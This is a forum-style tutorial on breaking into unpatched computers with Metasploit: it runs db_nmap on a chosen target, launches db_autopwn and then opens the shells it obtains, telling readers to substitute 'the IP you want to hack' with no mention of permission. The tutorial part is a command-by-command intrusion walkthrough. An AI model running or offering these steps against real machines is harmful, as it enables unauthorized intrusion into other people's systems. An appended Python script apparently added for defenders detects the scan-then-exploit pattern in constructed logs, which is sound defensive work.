In this tutorial you'll need:
- Metasploit
- PostgreSQL
Also: This only works on unpatched client computers, so this tutorial will not work every time, depending on the type of PC you're going to hack.
Metasploit is constantly updated, and there are in fact working remote exploits for newer OSes in it.
HOWEVER, not all systems will be vulnerable due to a router, firewall, or something else in the way.
Furthermore, a fully patched system will of course be safe against MSF, as MSF is a public tool using a collection of public exploits.
Make sure you download the right versions of the programs for your operating system (the one you're currently running on your PC).
1. First you want to open up PostgreSQL.
Once it's open, click
Code:
Start --> All Programs --> PostgreSQL 9.0 --> pgAdmin III
Then right click on your server and click connect. Remember to keep this open the whole time, otherwise it will fail and you'll have to restart again.
Now it's time to start. First go to
Start --> All Programs --> Metasploit Framework
Once you're there, open up the Metasploit GUI.
Now in the CMD window type
db_connect postgres:ThePassYouChose@localhost:5432
Once you've connected, type in
db_hosts
to make sure you've actually connected to the server.
If that is correct, then type in
db_nmap 127.0.0.1
IMPORTANT NOTE: Where I typed 127.0.0.1, replace that with the IP you want to hack.
Now it's time to exploit shit.
Let's start. First type in
db_autopwn -t -p -e -s -b
It will start. This will take a while, so just wait.
Once it's done, type in
sessions -l
to see what the scanner found. If it worked you should see a list of exploits :D
Now once you've got the exploits to hack the computer, you'll notice that they're all numbered, and they have names.
Just pick a name from the list and type in
sessions -i YOUR EXPLOIT NAME HERE
Or for a better example
sessions -i ExploitNumber
Whatever command you want to do, remember to put
sessions -i
Good luck
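Seen from the defender's side, the db_nmap and db_autopwn steps above leave a two-phase trace in connection logs: one source sweeps many ports on a host, then connects repeatedly to the ports that answered. The Python below is an added example, not part of the original tutorial; the log format, thresholds and addresses are constructed assumptions.

```python
from collections import defaultdict

SWEEP_PORTS = 8     # distinct ports probed on one host ...
SWEEP_WINDOW = 30   # ... within this many seconds = sweep (assumed thresholds)
BURST_WINDOW = 600  # seconds after the sweep in which follow-up traffic is counted
BURST_CONNS = 5     # repeat connections to swept-open ports that count as a burst

def make_sample():
    """Constructed log: '<epoch> <src> <dst> <dport> <open|closed>' per line."""
    swept = [21, 22, 23, 25, 80, 135, 139, 443, 445, 3389]
    lines = [f"{1000 + i} 10.0.0.66 10.0.0.5 {p} {'open' if p in (139, 445) else 'closed'}"
             for i, p in enumerate(swept)]
    lines += [f"{1100 + 3 * i} 10.0.0.66 10.0.0.5 {(139, 445)[i % 2]} open" for i in range(6)]
    lines.append("1130 10.0.0.66 10.0.0.5 31337 open")  # port not open during the sweep
    lines += ["1005 10.0.0.20 10.0.0.5 445 open", "garbage line"]  # normal client, bad line
    return "\n".join(lines)

def parse(log):
    """Yield (ts, src, dst, port, is_open); malformed lines are skipped."""
    for line in log.splitlines():
        f = line.split()
        if len(f) == 5 and f[0].isdigit() and f[3].isdigit() and f[4] in ("open", "closed"):
            yield int(f[0]), f[1], f[2], int(f[3]), f[4] == "open"

def find_sweep(events):
    """Return (end_time, open_ports) of the first window with >= SWEEP_PORTS distinct ports."""
    for i, (start, _, _) in enumerate(events):
        window = [e for e in events[i:] if e[0] - start <= SWEEP_WINDOW]
        if len({port for _, port, _ in window}) >= SWEEP_PORTS:
            return window[-1][0], {port for _, port, is_open in window if is_open}
    return None

def detect(log):
    pairs = defaultdict(list)
    for ts, src, dst, port, is_open in parse(log):
        pairs[(src, dst)].append((ts, port, is_open))
    alerts = []
    for (src, dst), events in sorted(pairs.items()):
        events.sort()
        sweep = find_sweep(events)
        if sweep is None:
            continue
        end, open_ports = sweep
        after = [e for e in events if end < e[0] <= end + BURST_WINDOW and e[2]]
        hits = sum(1 for _, port, _ in after if port in open_ports)
        new_ports = sorted({port for _, port, _ in after if port not in open_ports})
        alerts.append({"src": src, "dst": dst, "swept_open": sorted(open_ports),
                       "burst": hits >= BURST_CONNS, "new_ports": new_ports})
    return alerts
```

Calling `detect(make_sample())` returns one alert for the sweeping source and none for the ordinary client. The `new_ports` field lists ports that answered after the sweep but were not open during it, which is the place to look for a listener that appeared on the host afterwards.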